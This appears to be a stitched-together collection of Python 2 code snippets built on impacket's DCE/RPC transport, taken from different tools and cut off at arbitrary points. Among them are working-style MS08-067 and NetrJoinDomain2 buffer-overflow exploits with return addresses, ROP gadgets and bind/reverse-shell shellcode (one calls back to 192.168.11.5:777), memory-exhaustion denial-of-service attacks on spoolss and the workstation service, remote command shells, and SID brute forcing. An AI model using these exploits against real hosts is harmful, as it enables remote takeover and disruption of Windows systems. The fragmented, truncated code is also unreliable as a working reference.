def __DCEPacket(self): if (self.os=='1'): print 'Windows XP SP0/SP1 Universal\n' ret = "\x61\x13\x00\x01" jumper = nonxjmper % (ret, ret) elif (self.os=='2'): print 'Windows 2000 Universal\n' ret = "\xb0\x1c\x1f\x00" jumper = nonxjmper % (ret, ret) elif (self.os=='3'): print 'Windows 2003 SP0 Universal\n' ret = "\x9e\x12\x00\x01" #0x01 00 12 9e jumper = nonxjmper % (ret, ret) elif (self.os=='4'): print 'Windows 2003 SP1 English\n' ret_dec = "\x8c\x56\x90\x7c" #0x7c 90 56 8c dec ESI, ret @SHELL32.DLL ret_pop = "\xf4\x7c\xa2\x7c" #0x 7c a2 7c f4 push ESI, pop EBP, ret @SHELL32.DLL jmp_esp = "\xd3\xfe\x86\x7c" #0x 7c 86 fe d3 jmp ESP @NTDLL.DLL disable_nx = "\x13\xe4\x83\x7c" #0x 7c 83 e4 13 NX disable @NTDLL.DLL jumper = disableNXjumper % (ret_dec*6, ret_pop, disable_nx, jmp_esp*2) elif (self.os=='5'): print 'Windows XP SP3 French (NX)\n' ret = "\x07\xf8\x5b\x59" #0x59 5b f8 07 disable_nx = "\xc2\x17\x5c\x59" #0x59 5c 17 c2 jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case. elif (self.os=='6'): print 'Windows XP SP3 English (NX)\n' ret = "\x07\xf8\x88\x6f" #0x6f 88 f8 07 disable_nx = "\xc2\x17\x89\x6f" #0x6f 89 17 c2 jumper = nonxjmper % (disable_nx, ret) #the nonxjmper also work in this case. elif (self.os=='7'): print 'Windows XP SP3 English (AlwaysOn NX)\n' rvasets = {'call_HeapCreate': 0x21286,'add eax, ebp / mov ecx, 0x59ffffa8 / ret' : 0x2e796,'pop ecx / ret':0x2e796 + 6,'mov [eax], ecx / ret':0xd296,'jmp eax':0x19c6f,'mov [eax+8], edx / mov [eax+0xc], ecx / mov [eax+0x10], ecx / ret':0x10a56,'mov [eax+0x10], ecx / ret':0x10a56 + 6,'add eax, 8 / ret':0x29c64} jumper = generate_rop(rvasets)+"AB" #the nonxjmper also work in this case. else: print 'Not supported OS version\n' sys.exit(-1) print '[-]Initiating connection' self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target) self.__trans.connect() print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target self.__dce = self.__trans.DCERPC_class(self.__trans) self.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) path ="\x5c\x00"+"ABCDEFGHIJ"*10 + shellcode +"\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00" + "\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00" + jumper + "\x00" * 2 server="\xde\xa4\x98\xc5\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x41\x00\x42\x00\x43\x00\x44\x00\x45\x00\x46\x00\x47\x00\x00\x00" prefix="\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x5c\x00\x00\x00" self.__stub=server+"\x36\x01\x00\x00\x00\x00\x00\x00\x36\x01\x00\x00" + path +"\xE8\x03\x00\x00"+prefix+"\x01\x10\x00\x00\x00\x00\x00\x00" return
def run(self, addr): for protocol in self.__protocols: protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol print "Creating service %s..." % self.__serviceName stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport,'preferred_dialect'): rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: if self.__mode == 'SERVER': serverThread = SMBServer() serverThread.daemon = True serverThread.start() self.shell = RemoteShell(self.__share, rpctransport, self.__mode) self.shell.cmdloop() if self.__mode == 'SERVER': serverThread.stop() except Exception, e: raise print e sys.stdout.flush() sys.exit(1)
def run(self, addr, smbcmd): for protocol in self.__protocols: protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "\n\n [*] Trying protocol " + protocol + " on " + addr print " [*] Creating service %s..." % self.__serviceName stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'preferred_dialect'): rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: # create the object to execute our command self.executor = SmbExecute(self.__share, rpctransport, self.__mode, self.__serviceName, self.__outputfile) # actually execute the command out = self.executor.execute_remote(smbcmd) # return the output return out except (Exception, KeyboardInterrupt), e: print e sys.stdout.flush() return ""
def dump(self, addr): """Dumps the list of endpoints registered with the mapper listening at addr. Addr is a valid host name or IP address in string format. """ print 'Retrieving endpoint list from %s' % addr # Try all requested protocols until one works. entries = [] for protocol in self.__protocols: protodef = RPCDump.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password) try: entries = self.__fetchList(rpctransport) except Exception, e: print 'Protocol failed: %s' % e else: # Got a response. No need for further iterations. break
def dump(self, addr): print 'Brute forcing SIDs at %s' % addr # Try all requested protocols until one works. entries = [] for protocol in self.__protocols: protodef = LSALookupSid.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: entries = self.__bruteForce(rpctransport, self.__maxRid) except Exception, e: print 'Protocol failed: %s' % str(e) raise else: # Got a response. No need for further iterations. break
def play(self, addr): # Try all requested protocols until one works. entries = [] for protocol in self.__protocols: protodef = ATSVC_EXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: self.doStuff(rpctransport) except Exception, e: print 'Protocol failed: %s' % e else: # Got a response. No need for further iterations. break
def __DCEPacket(self): print '[-]Initiating connection' self.__trans = transport.DCERPCTransportFactory( 'ncacn_np:%s[\\pipe\\browser]' % self.target) self.__trans.connect() print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % self.target self.__dce = self.__trans.DCERPC_class(self.__trans) self.__dce.bind( uuid.uuidtup_to_bin( ('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) # Constructing Malicious Packet self.__stub = '\x01\x00\x00\x00' self.__stub += '\xd6\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00' self.__stub += shellcode self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub += '\x41\x41\x41\x41\x41\x41\x41\x41' self.__stub += '\x00\x00\x00\x00' self.__stub += '\x2f\x00\x00\x00\x00\x00\x00\x00\x2f\x00\x00\x00' self.__stub += payload self.__stub += '\x00\x00\x00\x00' self.__stub += '\x02\x00\x00\x00\x02\x00\x00\x00' self.__stub += '\x00\x00\x00\x00\x02\x00\x00\x00' self.__stub += '\x5c\x00\x00\x00\x01\x00\x00\x00' self.__stub += '\x01\x00\x00\x00' return
def run(self, addr): for protocol in self.__protocols: protodef = CMDEXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] color.echo("[*] Trying protocol %s..." % protocol, GREEN) color.echo("[*] Creating service %s..." % self.__serviceName, GREEN) stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'preferred_dialect'): rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) try: self.shell = RemoteShell(self.__share, rpctransport, self.__mode) self.shell.cmdloop() except Exception, e: color.echo("[!] %s" % e, RED)
def main(args): if len(args) != 4: print "usage: opdump.py hostname port interface version" return 1 host, port, interface, version = args[0], int(args[1]), args[2], args[3] stringbinding = "ncacn_ip_tcp:%s" % host trans = transport.DCERPCTransportFactory(stringbinding) trans.set_dport(port) results = [] for i in range(256): dce = trans.get_dce_rpc() dce.connect() iid = uuid.uuidtup_to_bin((interface, version)) dce.bind(iid) dce.call(i, "") try: resp = dce.recv() except dcerpc.Exception, e: result = str(e) else: result = "success" dce.disconnect() results.append(result)
def __DCEPacket(self): print '[-]Initiating connection' try: self.__trans = transport.DCERPCTransportFactory( 'ncacn_np:%s[\\pipe\\browser]' % self.target) self.__trans.connect() except Exception, e: print "\n Something went wrong. Might not be vulnerable..\n Printing error: " + str( e) + "\n\n Returning to exploits menu..."
def setupConnection(self): proto = int(self.params['proto']) self.params['port'] = int(self.params['port']) stringbinding = self.protocols[proto] stringbinding %= self.params print "Using stringbinding: %r" % stringbinding self.trans = transport.DCERPCTransportFactory(stringbinding) self.trans.set_max_fragment_size(int(self.params['transport_frag'])) self.trans.set_dport(int(self.params['port'])) try: # SMB parameters handling self.trans.setup_smb_server() # force building the SMB object so we can change its methods self.smb = self.trans.get_smb_server() # select the right tree_connect arg = int(self.params['tree_connect']) if arg == 0: self.smb.tree_connect_andx = self.smb.tree_connect if arg == 1: self.smb.tree_connect_andx = self.smb.tree_connect_andx # open selection arg = int(self.params['open']) if arg == 0: self.smb.nt_create_andx = self.open elif arg == 1: self.smb.nt_create_andx = self.open_andx # read selection arg = int(self.params['read']) if arg == 0: self.smb.read_andx = self.smb.read elif arg == 1: self.smb.read_andx = self.smb.read_andx elif arg == 2: self.smb.read_andx = self.smb.read_raw elif arg == 3: self.smb.original_read_andx = self.smb.read_andx self.smb.read_andx = self.read_cycling # write selection arg = int(self.params['write']) if arg == 0: self.smb.write_andx = self.smb.write elif arg == 1: self.smb.write_andx = self.smb.write_andx elif arg == 2: self.smb.write_andx = self.smb.write_raw elif arg == 3: self.smb.original_write_andx = self.smb.write_andx self.smb.write_andx = self.write_cycling # smb credentials self.trans.set_credentials(self.params['smb_user'], self.params['smb_passwd'], lm_hash=self.params['smb_lmhash'], nt_hash=self.params['smb_nthash']) except Exception, e: pass
def main(args): if len(args) != 2: print "usage: ./ifmap.py <host> <port>" return 1 host = args[0] port = int(args[1]) stringbinding = "ncacn_ip_tcp:%s" % host trans = transport.DCERPCTransportFactory(stringbinding) trans.set_dport(port) dce = trans.get_dce_rpc() dce.connect() iid = uuid.uuidtup_to_bin(("afa8bd80-7d8a-11c9-bef4-08002b102989", "1.0")) dce.bind(iid) dcemgmt = mgmt.DCERPCMgmt(dce) ifids = dcemgmt.inq_if_ids() uuidtups = set( uuid.bin_to_uuidtup(ifids.get_if_binuuid(index)) for index in range(ifids.get_ifcount()) ) dce.disconnect() probes = uuidtups | uuid_database for tup in sorted(probes): listed = tup in uuidtups dce.connect() binuuid = uuid.uuidtup_to_bin(tup) try: dce.bind(binuuid) except dcerpc.Exception, e: resp = dcerpc.MSRPCBindAck(str(e.args[1])) if (resp.getCtxItem(1)['Result'], resp.getCtxItem(1)['Reason']) == (2, 1): listening = False else: raise else: listening = True listed = tup in uuidtups otherversion = any(tup[0] == uuidstr for uuidstr, ver in uuidtups) if listed or listening: print "%r: %s, %s" % ( tup, "listed" if listed else "other version listed" if otherversion else "not listed", "listening" if listening else "not listening" )
def test_connection(self): rpctransport = transport.DCERPCTransportFactory(self.stringBinding) rpctransport.set_dport(self.dport) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(epm.MSRPC_UUID_PORTMAP) dce.disconnect()
def __connect(self): ''' SMB connect to the Computer Browser service named pipe Reference: http://www.hsc.fr/ressources/articles/win_net_srv/msrpc_browser.html ''' try: self.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % self.target) self.__trans.connect() except smb.SessionError, _: raise connectionException, 'access denied (RestrictAnonymous is probably set to 2)'
def test_connectionHashes(self): rpctransport = transport.DCERPCTransportFactory(self.stringBinding) rpctransport.set_dport(self.dport) if hasattr(rpctransport, 'set_credentials'): lmhash, nthash = self.hashes.split(':') # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, '', self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() dce.connect() dce.bind(epm.MSRPC_UUID_PORTMAP) dce.disconnect()
def test_dceFragmentation(self): rpctransport = transport.DCERPCTransportFactory(self.stringBinding) rpctransport.set_dport(self.dport) if hasattr(rpctransport, 'set_credentials'): lmhash, nthash = self.hashes.split(':') # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, '', self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() dce.set_max_fragment_size(1) dce.set_credentials(*(rpctransport.get_credentials())) dce.connect() dce.bind(epm.MSRPC_UUID_PORTMAP) rpcepm = epm.DCERPCEpm(dce) resp = rpcepm.lookup('', inquireType=epm.RPC_C_EP_ALL_ELTS) dce.disconnect()
def test_packetAnonWINNTPacketPrivacy(self): rpctransport = transport.DCERPCTransportFactory(self.stringBinding) rpctransport.set_dport(self.dport) if hasattr(rpctransport, 'set_credentials'): lmhash, nthash = self.hashes.split(':') # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.username, self.password, self.domain, lmhash, nthash) dce = rpctransport.get_dce_rpc() #dce.set_max_fragment_size(1) dce.connect() dce.set_auth_type(dcerpc.RPC_C_AUTHN_WINNT) dce.set_auth_level(dcerpc.RPC_C_AUTHN_LEVEL_PKT_PRIVACY) dce.bind(epm.MSRPC_UUID_PORTMAP) rpcepm = epm.DCERPCEpm(dce) resp = rpcepm.lookup('', inquireType=epm.RPC_C_EP_ALL_ELTS) dce.disconnect()
def run(self, addr): for protocol in self.__protocols: protodef = PSEXEC.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s...\n" % protocol stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) #if hasattr(rpctransport,'preferred_dialect'): # rpctransport.preferred_dialect(SMB_DIALECT) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) self.doStuff(rpctransport)
def run(self): self.gom.echo() self.gom.echo("Trying to exploit ...") self.gom.echo() pipe = 'browser' UUID = ('6bffd098-a112-3610-9833-46c3f87e345a', '1.0') host = self.target stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]" stringbinding %= {'host': host, 'pipe': pipe} MB = 1024 * 1024 if self.wizard: res = raw_input("Memory size [1024]: ") if res != "": self.memorySize = int(res) memory_size = MB * self.memorySize query = NetrWkstaUserEnum() server = "%s\x00" % (host) query['server'] = B1() query['server']['id'] = 0x41414141 query['server']['actual'] = len(server) query['server']['max'] = len(server) query['server']['str'] = utf16(server) query['max_len'] = memory_size trans = transport.DCERPCTransportFactory(stringbinding) self.gom.echo("[*] Connecting to %s:445 (NULL Session)" % (self.target)) try: trans.connect() except Exception, err: self.gom.echo("[-] %s" % (err)) return False
from impacket.dcerpc import transport import sys #################################### # MS08_067 case of study by ly0n # Greetz: muts,ryujin & offsec team #################################### try: target = sys.argv[1] port = 445 except IndexError: print "Usage: program host" sys.exit() trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target) trans.connect() dce = trans.DCERPC_class(trans) dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) # revere shell 192.168.11.5 port 777 by msfpayload payload = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" "\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f"
def run(self): self.gom.echo() self.gom.echo("Trying to exploit ...") self.gom.echo() MB = 1024 * 1024 host = self.target if self.wizard: res = raw_input("Memory size [1024]: ") if res != "": self.memorySize = int(res) memory_size = MB * self.memorySize interface = ('spoolss', '12345678-1234-abcd-ef00-0123456789ab', '1.0') stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]" stringbinding %= { 'host': host, 'pipe': interface[0], } trans = transport.DCERPCTransportFactory(stringbinding) self.gom.echo("[*] Connecting to %s:445" % (host)) try: trans.connect() except: self.gom.echo("[-] Connect failed") return False self.gom.echo("[+] Connected") dce = trans.DCERPC_class(trans) dce.bind(uuid.uuidtup_to_bin((interface[1], interface[2]))) query = OpenPrinterEx() printer = "\\\\%s\x00" % (host) query['printer'] = B1() query['printer']['id'] = 0x41414141 query['printer']['max'] = len(printer) query['printer']['actual'] = len(printer) query['printer']['str'] = printer.encode('utf_16_le') client = "\\\\h07\x00" query['client'] = B2() query['client']['max'] = len(client) query['client']['actual'] = len(client) query['client']['str'] = client.encode('utf_16_le') user = "******" query['user'] = B2() query['user']['max'] = len(user) query['user']['actual'] = len(user) query['user']['str'] = user.encode('utf_16_le') dce.call(query.opnum, query) raw = dce.recv() handle = raw[:20] if (handle == ("\x00" * 20)): self.gom.echo("[-] ERR: OpenPrinterEx()") if (raw[20:] == "\x09\x07\x00\x00"): self.gom.echo( "[-] Return code: Invalid printer name (0x00000709)") if (raw[20:] == "\x05\x00\x00\x00"): self.gom.echo("[-] Return code: Access denied (0x00000005)") return False query = GetPrinterData() value = "blah_blah\x00" query['handle'] = handle query['value'] = B2() query['value']['max'] = len(value) query['value']['actual'] = len(value) query['value']['str'] = value.encode('utf_16_le') query['offered'] = memory_size dce.call(query.opnum, query) try: raw = dce.recv() status = raw[:4] r_size = raw[4:8] if (status == "\x1b\x00\x00\x1c"): self.gom.echo("[-] Memory allocation error, out of memory") return True if (r_size == pack("<L", memory_size)): self.gom.echo("[+] Memory allocated!") except NetBIOSTimeout, err: self.gom.echo("[+] %s" % (err)) self.gom.echo("[+] %s: Out of memory" % (host))
def DCEconnectAndExploit(target, domain): baselen = 3708 stringbinding = "ncacn_np:%(host)s[\\pipe\\%(pipe)s]" stringbinding %= { 'host': target, 'pipe': 'wkssvc', 'port': 445, } print 'Connecting to named pipe (wkssvc)' trans = transport.DCERPCTransportFactory(stringbinding) trans.connect() print 'Setting up DCE transport' dce = trans.DCERPC_class(trans) dce.bind( uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a', '1.0'))) print 'Sending attack payload to target' #NetrJoinDomain2 data: Hostname query1 = "\xaa\xbb\xcc\xdd" query1 += "\x07\x00\x00\x00" query1 += "\x00\x00\x00\x00" query1 += "\x07\x00\x00\x00" query1 += "\x5C\x00\x5C\x00" query1 += "\x41\x00\x55\x00" query1 += "\x58\x00\x37\x00" query1 += "\x00\x00\x00\x00" #NetrJoinDomain2 data: Domain/Hostname targetd = '\x00'.join(list(domain)) + '\x00' Len = baselen + len(domain) query2 = struct.pack('L', Len) query2 += struct.pack('L', 0) query2 += struct.pack('L', Len) query2 += targetd query3 = "\x5C\x00\x5C\x00\x76\x00\x90\x90" query3 += "\x90\x90" * 1058 query3 += "\xEB\x06" #6 byte jump from current pointer in ebx query3 += "\x27\x16\xE1\x77" #Address from user32.dll (0x77E11627) #350 byte port binding shellcode query3 += "\x90\x90\x90\x90\x90\x90" query3 += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73" query3 += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83" query3 += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2" query3 += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87" query3 += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98" query3 += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91" query3 += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75" query3 += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45" query3 += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57" query3 += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc" query3 += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0" query3 += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7" query3 += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a" query3 += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4" query3 += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4" query3 += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87" query3 += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f" query3 += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3" query3 += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68" query3 += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65" query3 += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e" query3 += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63" query3 += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e" query3 += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91" query3 += "\xba\xa6\xf5\x31\x39\x59\x23\xce" query3 += "\x90\x90" * 2467 query3 += "\x00\x00" query3 += "\x00\x00\x00\x00" query3 += "\x00\x00\x00\x00" query3 += "\x00\x00\x00\x00" query3 += "\x00\x00" query3 += "\x01\x00\x00\x00" query = query1 + query2 + query3 dce.call(0x16, query)
('null_pointer', '<L=0'), ('max_len', '<L'), ('referent_id2', '<L=0x43434343'), ('enumeration_handle', '<L=0x00000000'), ) query = NetrWkstaUserEnum() server = "%s\x00" % (host) query['server'] = B1() query['server']['id'] = 0x41414141 query['server']['actual'] = len(server) query['server']['max'] = len(server) query['server']['str'] = utf16(server) query['max_len'] = memory_size trans = transport.DCERPCTransportFactory(stringbinding) print "[*] Connecting to %s:445 (NULL Session)" % (host) try: trans.connect() except Exception, err: print "[-] %s" % (err) exit() print "[+] Connected" dce = trans.DCERPC_class(trans) dce.bind(uuid.uuidtup_to_bin((UUID[0], UUID[1]))) dce.call(query.opnum, query)